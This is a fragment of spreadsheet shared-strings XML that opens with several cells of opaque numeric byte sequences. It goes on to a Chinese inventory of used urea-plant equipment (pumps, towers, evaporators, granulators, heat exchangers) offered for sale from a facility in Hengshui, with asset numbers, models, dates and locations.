    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>机会总是留给有准备的人！只要有用，机会难得</t>
  </si>
  <si>
    <t>说明：</t>
  </si>
  <si>
    <t>工艺装置生产能力为年产30万吨尿素，整套处置2000万元，分隔处置有参考价，厂内现状交货（衡水市）；买方承担拆解和外运费用。</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>设备编号</t>
  </si>
  <si>
    <t>设备名称</t>
  </si>
  <si>
    <t>规格型号</t>
  </si>
  <si>
    <t>生产厂家</t>
  </si>
  <si>
    <t>计量单位</t>
  </si>
  <si>
    <t>数量</t>
  </si>
  <si>
    <t>启用日期</t>
  </si>
  <si>
    <t>账面原值</t>
  </si>
  <si>
    <t>参考价</t>
  </si>
  <si>
    <t>存放地点</t>
  </si>
  <si>
    <t>尿素车间15万吨</t>
  </si>
  <si>
    <t>00786</t>
  </si>
  <si>
    <t>管道泵</t>
  </si>
  <si>
    <t>台</t>
  </si>
  <si>
    <t>2004.12.31</t>
  </si>
  <si>
    <t>15万(1)20万(2)</t>
  </si>
  <si>
    <t>00313</t>
  </si>
  <si>
    <t>二表槽</t>
  </si>
  <si>
    <t>φ1800*3000</t>
  </si>
  <si>
    <t>2002.12.31</t>
  </si>
  <si>
    <t>15万吨</t>
  </si>
  <si>
    <t>00317</t>
  </si>
  <si>
    <t>自动包装机</t>
  </si>
  <si>
    <t>ZDC-Ⅱ</t>
  </si>
  <si>
    <t>00318</t>
  </si>
  <si>
    <t>皮带输送机</t>
  </si>
  <si>
    <t>B500</t>
  </si>
  <si>
    <t>00339</t>
  </si>
  <si>
    <t>尿液泵</t>
  </si>
  <si>
    <t>50F-40</t>
  </si>
  <si>
    <t>00340</t>
  </si>
  <si>
    <t>尿液槽</t>
  </si>
  <si>
    <t>10平米</t>
  </si>
  <si>
    <t>00341</t>
  </si>
  <si>
    <t>造粒风组</t>
  </si>
  <si>
    <t>zx-6</t>
  </si>
  <si>
    <t>00342</t>
  </si>
  <si>
    <t>一段蒸发器</t>
  </si>
  <si>
    <t>800-2000/5</t>
  </si>
  <si>
    <t>00343</t>
  </si>
  <si>
    <t>中间冷却器</t>
  </si>
  <si>
    <t>直径5</t>
  </si>
  <si>
    <t>00344</t>
  </si>
  <si>
    <t>一段蒸发冷却器</t>
  </si>
  <si>
    <t>f700h6191</t>
  </si>
  <si>
    <t>00345</t>
  </si>
  <si>
    <t>二段蒸发冷却器</t>
  </si>
  <si>
    <t>直径500*10</t>
  </si>
  <si>
    <t>00346</t>
  </si>
  <si>
    <t>尿素合成塔</t>
  </si>
  <si>
    <t>直径1200*120</t>
  </si>
  <si>
    <t>00657</t>
  </si>
  <si>
    <t>2003.12.27</t>
  </si>
  <si>
    <t>00826</t>
  </si>
  <si>
    <t>尿素水解泵</t>
  </si>
  <si>
    <t>JFND25-30×8</t>
  </si>
  <si>
    <t>2005.04.30</t>
  </si>
  <si>
    <t>00827</t>
  </si>
  <si>
    <t>解柝泵</t>
  </si>
  <si>
    <t>JINB65-40-250</t>
  </si>
  <si>
    <t>00871</t>
  </si>
  <si>
    <t>水解塔</t>
  </si>
  <si>
    <t>φ1500×24150</t>
  </si>
  <si>
    <t>2005.07.20</t>
  </si>
  <si>
    <t>00872</t>
  </si>
  <si>
    <t>第一、二解吸塔</t>
  </si>
  <si>
    <t>φ1200×29380</t>
  </si>
  <si>
    <t>00873</t>
  </si>
  <si>
    <t>回流冷凝器</t>
  </si>
  <si>
    <t>φ900×7527</t>
  </si>
  <si>
    <t>00874</t>
  </si>
  <si>
    <t>回流槽</t>
  </si>
  <si>
    <t>φ1000</t>
  </si>
  <si>
    <t>00875</t>
  </si>
  <si>
    <t>二蒸加热器</t>
  </si>
  <si>
    <t>φ400</t>
  </si>
  <si>
    <t>00876</t>
  </si>
  <si>
    <t>二蒸分离器</t>
  </si>
  <si>
    <t>φ1800</t>
  </si>
  <si>
    <t>00877</t>
  </si>
  <si>
    <t>闪蒸分离器</t>
  </si>
  <si>
    <t>50平方米</t>
  </si>
  <si>
    <t>00878</t>
  </si>
  <si>
    <t>一蒸加热器</t>
  </si>
  <si>
    <t>φ600</t>
  </si>
  <si>
    <t>00879</t>
  </si>
  <si>
    <t>二分塔改造</t>
  </si>
  <si>
    <t>00880</t>
  </si>
  <si>
    <t>一吸外冷器</t>
  </si>
  <si>
    <t>00881</t>
  </si>
  <si>
    <t>一吸加长段</t>
  </si>
  <si>
    <t>φ1600/φ1000</t>
  </si>
  <si>
    <t>00882</t>
  </si>
  <si>
    <t>预蒸馏塔及内件</t>
  </si>
  <si>
    <t>00883</t>
  </si>
  <si>
    <t>一分加热器</t>
  </si>
  <si>
    <t>76m2</t>
  </si>
  <si>
    <t>00915</t>
  </si>
  <si>
    <t>尿素造粒机</t>
  </si>
  <si>
    <t>ZL-H</t>
  </si>
  <si>
    <t>2005.07.31</t>
  </si>
  <si>
    <t>00916</t>
  </si>
  <si>
    <t>真空喷射器</t>
  </si>
  <si>
    <t>SP-13</t>
  </si>
  <si>
    <t>00919</t>
  </si>
  <si>
    <t>泵</t>
  </si>
  <si>
    <t>IH50-32-250</t>
  </si>
  <si>
    <t>00921</t>
  </si>
  <si>
    <t>IH50-32-200</t>
  </si>
  <si>
    <t>00940</t>
  </si>
  <si>
    <t>双吸熔融泵</t>
  </si>
  <si>
    <t>JFRB6-40-250</t>
  </si>
  <si>
    <t>2005.09.30</t>
  </si>
  <si>
    <t>00947</t>
  </si>
  <si>
    <t>液氨缓冲过滤器</t>
  </si>
  <si>
    <t>5.287m3</t>
  </si>
  <si>
    <t>2005.11.30</t>
  </si>
  <si>
    <t>00962</t>
  </si>
  <si>
    <t>二甲泵</t>
  </si>
  <si>
    <t>3JA-19/2.03-T</t>
  </si>
  <si>
    <t>00971</t>
  </si>
  <si>
    <t>板式换热器</t>
  </si>
  <si>
    <t>BRQ-250平方</t>
  </si>
  <si>
    <t>01049</t>
  </si>
  <si>
    <t>风机</t>
  </si>
  <si>
    <t>G4-73-11D</t>
  </si>
  <si>
    <t>2006.05.30</t>
  </si>
  <si>
    <t>01073</t>
  </si>
  <si>
    <t>液氨缓冲槽</t>
  </si>
  <si>
    <t>2006.07.31</t>
  </si>
  <si>
    <t>01214</t>
  </si>
  <si>
    <t>螺旋板换热器</t>
  </si>
  <si>
    <t>100平方</t>
  </si>
  <si>
    <t>2007.03.31</t>
  </si>
  <si>
    <t>00321</t>
  </si>
  <si>
    <t>惰洗器</t>
  </si>
  <si>
    <t>φ600/φ800</t>
  </si>
  <si>
    <t>15万吨 框架</t>
  </si>
  <si>
    <t>00322</t>
  </si>
  <si>
    <t>二循二冷器</t>
  </si>
  <si>
    <t>f=44平方米</t>
  </si>
  <si>
    <t>00323</t>
  </si>
  <si>
    <t>一吸冷却器</t>
  </si>
  <si>
    <t>F600H6930</t>
  </si>
  <si>
    <t>00325</t>
  </si>
  <si>
    <t>预蒸馏塔</t>
  </si>
  <si>
    <t>F1000H8463</t>
  </si>
  <si>
    <t>00326</t>
  </si>
  <si>
    <t>二循一冷器</t>
  </si>
  <si>
    <t>168m2</t>
  </si>
  <si>
    <t>00327</t>
  </si>
  <si>
    <t>尾吸塔</t>
  </si>
  <si>
    <t>φ600×7290</t>
  </si>
  <si>
    <t>00329</t>
  </si>
  <si>
    <t>气淋液膨胀槽</t>
  </si>
  <si>
    <t>φ1200×2880</t>
  </si>
  <si>
    <t>00330</t>
  </si>
  <si>
    <t>氨冷器B</t>
  </si>
  <si>
    <t>220m2</t>
  </si>
  <si>
    <t>00920</t>
  </si>
  <si>
    <t>IH40-32-250</t>
  </si>
  <si>
    <t>15万吨(老框架)</t>
  </si>
  <si>
    <t>00314</t>
  </si>
  <si>
    <t>熔融泵</t>
  </si>
  <si>
    <t>65RB-250</t>
  </si>
  <si>
    <t>15万吨二楼</t>
  </si>
  <si>
    <t>00320</t>
  </si>
  <si>
    <t>气体冷却器</t>
  </si>
  <si>
    <t>3300×1500×1100</t>
  </si>
  <si>
    <t>15万吨框架</t>
  </si>
  <si>
    <t>00331</t>
  </si>
  <si>
    <t>尾吸冷却器</t>
  </si>
  <si>
    <t>6m2</t>
  </si>
  <si>
    <t>00332</t>
  </si>
  <si>
    <t>解吸换热器</t>
  </si>
  <si>
    <t>LB295</t>
  </si>
  <si>
    <t>00333</t>
  </si>
  <si>
    <t>解吸冷却器</t>
  </si>
  <si>
    <t>105m2</t>
  </si>
  <si>
    <t>00334</t>
  </si>
  <si>
    <t>氨冷C</t>
  </si>
  <si>
    <t>109m2</t>
  </si>
  <si>
    <t>00336</t>
  </si>
  <si>
    <t>板冷</t>
  </si>
  <si>
    <t>BRQ85</t>
  </si>
  <si>
    <t>00338</t>
  </si>
  <si>
    <t>离心泵(解析泵)</t>
  </si>
  <si>
    <t>JFND25-30X8</t>
  </si>
  <si>
    <t>00319</t>
  </si>
  <si>
    <t>氨冷A</t>
  </si>
  <si>
    <t>395 m2</t>
  </si>
  <si>
    <t>15万吨框架六楼</t>
  </si>
  <si>
    <t>00305</t>
  </si>
  <si>
    <t>尾吸泵</t>
  </si>
  <si>
    <t>40f-65</t>
  </si>
  <si>
    <t>15万吨框架一楼</t>
  </si>
  <si>
    <t>00306</t>
  </si>
  <si>
    <t>氨泵密封水泵</t>
  </si>
  <si>
    <t>40f-40</t>
  </si>
  <si>
    <t>00307</t>
  </si>
  <si>
    <t>一甲泵</t>
  </si>
  <si>
    <t>3JA-19/22-T</t>
  </si>
  <si>
    <t>00308</t>
  </si>
  <si>
    <t>30J-5.5/2-QF</t>
  </si>
  <si>
    <t>00311</t>
  </si>
  <si>
    <t>蒸汽冷凝液泵</t>
  </si>
  <si>
    <t>2gc-5x2</t>
  </si>
  <si>
    <t>15万吨框架一楼南外场</t>
  </si>
  <si>
    <t>00312</t>
  </si>
  <si>
    <t>碳氨液槽</t>
  </si>
  <si>
    <t>f3000h4455</t>
  </si>
  <si>
    <t>00348</t>
  </si>
  <si>
    <t>造粒机</t>
  </si>
  <si>
    <t>15万吨尿素</t>
  </si>
  <si>
    <t>00963</t>
  </si>
  <si>
    <t>甲铵泵</t>
  </si>
  <si>
    <t>00964</t>
  </si>
  <si>
    <t>液氨泵</t>
  </si>
  <si>
    <t>3YA-29/22-T</t>
  </si>
  <si>
    <t>上海大隆</t>
  </si>
  <si>
    <t>01596</t>
  </si>
  <si>
    <t>蒸发式冷凝器</t>
  </si>
  <si>
    <t>2010.08.26</t>
  </si>
  <si>
    <t>15万吨尿素冰机用</t>
  </si>
  <si>
    <t>01725</t>
  </si>
  <si>
    <t>全焊式板式换热器</t>
  </si>
  <si>
    <t>BRQ-85型 150m2</t>
  </si>
  <si>
    <t>2011.12.27</t>
  </si>
  <si>
    <t>15万吨尿素岗位</t>
  </si>
  <si>
    <t>01726</t>
  </si>
  <si>
    <t>BRQg-85型 150m2</t>
  </si>
  <si>
    <t>01727</t>
  </si>
  <si>
    <t>全焊式板式换热气</t>
  </si>
  <si>
    <t>BRQg-110型 150m2</t>
  </si>
  <si>
    <t>01628</t>
  </si>
  <si>
    <t>二段循环第一冷凝器</t>
  </si>
  <si>
    <t>F=360m2</t>
  </si>
  <si>
    <t>2011.03.26</t>
  </si>
  <si>
    <t>15万吨尿素岗位 北框架三楼</t>
  </si>
  <si>
    <t>01981</t>
  </si>
  <si>
    <t>造粒喷头</t>
  </si>
  <si>
    <t>350T</t>
  </si>
  <si>
    <t>2013.07.31</t>
  </si>
  <si>
    <t>15万吨尿素造粒岗位</t>
  </si>
  <si>
    <t>00819</t>
  </si>
  <si>
    <t>喷射泵</t>
  </si>
  <si>
    <t>JINB125-100-250</t>
  </si>
  <si>
    <t>2005.03.31</t>
  </si>
  <si>
    <t>15万吨三楼</t>
  </si>
  <si>
    <t>02063</t>
  </si>
  <si>
    <t>650/t</t>
  </si>
  <si>
    <t>只</t>
  </si>
  <si>
    <t>2015.08.25</t>
  </si>
  <si>
    <t>15万吨'造粒岗位</t>
  </si>
  <si>
    <t>01133</t>
  </si>
  <si>
    <t>造粒机组</t>
  </si>
  <si>
    <t>套</t>
  </si>
  <si>
    <t>2007.01.01</t>
  </si>
  <si>
    <t>15万吨'造粒塔顶</t>
  </si>
  <si>
    <t>02008</t>
  </si>
  <si>
    <t>小尿素DCS系统</t>
  </si>
  <si>
    <t>MACS系统</t>
  </si>
  <si>
    <t>2013.11.25</t>
  </si>
  <si>
    <t>尿素车间15万吨岗位</t>
  </si>
  <si>
    <t>01577</t>
  </si>
  <si>
    <t>北尿素液位槽</t>
  </si>
  <si>
    <t>DN500</t>
  </si>
  <si>
    <t>上海龙杰机械</t>
  </si>
  <si>
    <t>2010.06.11</t>
  </si>
  <si>
    <t>北尿素框架</t>
  </si>
  <si>
    <t>02071</t>
  </si>
  <si>
    <t>不锈钢水解泵</t>
  </si>
  <si>
    <t>DFS12-50*5</t>
  </si>
  <si>
    <t>2015.11.25</t>
  </si>
  <si>
    <t>框架岗位</t>
  </si>
  <si>
    <t>高压冲洗水泵</t>
  </si>
  <si>
    <t>3D2Y1/25</t>
  </si>
  <si>
    <t>空气压缩机</t>
  </si>
  <si>
    <t>WP60</t>
  </si>
  <si>
    <t>南京压缩机厂</t>
  </si>
  <si>
    <t>1-0.433/60</t>
  </si>
  <si>
    <t>氨水泵</t>
  </si>
  <si>
    <t>3DJ-2/2.4-T</t>
  </si>
  <si>
    <t>循环水泵</t>
  </si>
  <si>
    <t>IS200-315</t>
  </si>
  <si>
    <t>上海水泵厂</t>
  </si>
  <si>
    <t>ISR150-125-250</t>
  </si>
  <si>
    <t>保定水泵厂</t>
  </si>
  <si>
    <t>DG25-30X3</t>
  </si>
  <si>
    <t>石家庄</t>
  </si>
  <si>
    <t>二分塔</t>
  </si>
  <si>
    <t>105平方</t>
  </si>
  <si>
    <t>邯郸</t>
  </si>
  <si>
    <t>水槽（玻璃钢）</t>
  </si>
  <si>
    <t>25平方</t>
  </si>
  <si>
    <t>搅拌槽（不锈钢）</t>
  </si>
  <si>
    <t>1.5平方</t>
  </si>
  <si>
    <t>个</t>
  </si>
  <si>
    <t>一吸塔</t>
  </si>
  <si>
    <t>3D-YA-15/22F</t>
  </si>
  <si>
    <t>350S-75B</t>
  </si>
  <si>
    <t>四川新达</t>
  </si>
  <si>
    <t>1992（3台）2005（2台）</t>
  </si>
  <si>
    <t xml:space="preserve">L47 </t>
  </si>
  <si>
    <t>预分离器</t>
  </si>
  <si>
    <t>事故槽</t>
  </si>
  <si>
    <t>100立方不锈钢</t>
  </si>
  <si>
    <t>发电机组</t>
  </si>
  <si>
    <t>50KW</t>
  </si>
  <si>
    <t>尿素车间20万吨</t>
  </si>
  <si>
    <t>01193</t>
  </si>
  <si>
    <t>一段吸收塔</t>
  </si>
  <si>
    <t>2007.02.28</t>
  </si>
  <si>
    <t>20万</t>
  </si>
  <si>
    <t>01194</t>
  </si>
  <si>
    <t>一段蒸发加热器</t>
  </si>
  <si>
    <t>47.5m2</t>
  </si>
  <si>
    <t>01195</t>
  </si>
  <si>
    <t>φ500*10</t>
  </si>
  <si>
    <t>01196</t>
  </si>
  <si>
    <t>ф1400*16</t>
  </si>
  <si>
    <t>01197</t>
  </si>
  <si>
    <t>汽水分离器</t>
  </si>
  <si>
    <t>ф2000*14</t>
  </si>
  <si>
    <t>2007.02.27</t>
  </si>
  <si>
    <t>01198</t>
  </si>
  <si>
    <t>活性炭过滤器</t>
  </si>
  <si>
    <t>DN1800</t>
  </si>
  <si>
    <t>01207</t>
  </si>
  <si>
    <t>化工离心泵</t>
  </si>
  <si>
    <t>IH65-50-160</t>
  </si>
